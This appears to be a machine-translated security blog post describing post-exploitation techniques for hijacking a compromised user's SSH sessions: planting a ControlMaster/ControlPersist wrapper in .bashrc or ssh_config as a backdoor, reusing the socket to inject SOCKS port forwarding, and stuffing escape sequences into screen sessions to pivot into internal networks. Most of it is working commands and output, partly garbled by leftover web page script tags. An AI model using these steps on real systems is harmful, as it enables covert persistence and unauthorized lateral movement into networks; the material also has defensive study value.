Hijack SSH session injection port forwarding
0x00 Preface
Yesterday, the links in A niuba group were actually suitable for leaving backdoors. They belong to the Post Exploitation stage. I have never used this method before. They are all dumpfounded and used ld_preload backdoors, after the test is passed in the actual environment, if it finds that the test is available and has more practical value, let's take a look at some of the errors.
0x01 details 1.1 scenario 1:
The attack process is as follows: the SSH client (ssh_user) connects to ipv_1, And the attacker (attacker) can control the ssh_user machine. Attackers can inject port forwarding to intrude networks after ipv_1 and ipv_2. The procedure is as follows:
1. attackers can modify the ssh client in two ways. If you have the ROOT permission, you can directly modify the/etc/ssh/ssh_config file. If you do not have the permission to modify the ssh_config file. use ssh in bashrc. The main items involved are as follows:
ControlPath /tmp/%r@%h:%pControlMaster autoControlPersist yes
If ControlPersist is enabled, the user can hijack the session even if the session is exited after an SSH connection, because the file will not be deleted.
2. When (ssh_user) is connected to ipv_1 (192.168.56.131), a socket file is generated in the/tmp directory. We use
ssh -S /tmp/root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\:22 %h
To connect
The command for injecting command port forwarding is as follows:
ssh -O forward -D 8888 -S /tmp/root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\:22 %x
After executing this command, we can use port 8888 of the ssh_user machine as the SOCKS5 proxy to access the CIDR block after ipv_2.
3. As mentioned earlier, if ControlPersist is yes, the sockets file will not be automatically deleted. We can manually rm delete/tmp/root@192.168.56.131: 22, or use it elegantly.
root@kali: # ssh -O exit -S /tmp/root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\:22 %x
.
The method for encapsulating the ssh command in. bashrc is as follows:
ssh () { /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";}
1.2 Scenario 2:
This is the case when ssh_user uses screen to manage ssh sessions. The steps are as follows:
1. When ssh_user is used
screen ssh root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>
When you connect to the remote terminal _1 (192.168.56.131), the corresponding file is displayed in/var/run/screen.
root@kali:~# ls -la /var/run/screen/total 0drwxrwxr-x 3 root utmp 60 Mar 16 03:37 .drwxr-xr-x 20 root root 640 Mar 3 21:23 ..drwx------ 2 root root 60 Mar 16 04:21 S-root
Where the S-ROOT represents a remote connection from a local root user, you can use screen-r root/to take over the session, or use screen-x 6851. pts-0.kali.
2. If you want to inject port forwarding, you must first execute script/dev/null to bypass the pts/tty limit. The command is as follows:
root@kali:~# lsof -i TCP:8888root@kali:~# script /dev/null Script started, file is /dev/nullroot@kali:~# screen -S 6851.pts-0.kali -p 0 -X stuff $'~C'root@kali:~# screen -S 6851.pts-0.kali -p 0 -X stuff $'-D:8888\n\n'root@kali:~# lsof -i TCP:8888COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAMEssh 6852 root 7u IPv4 94301 0t0 TCP *:8888 (LISTEN)ssh 6852 root 8u IPv6 94302 0t0 TCP *:8888 (LISTEN)
The ssh session injected into screen has a bad point, that is, the command you typed will be displayed at the same time as the currently connected user, which is easy to detect.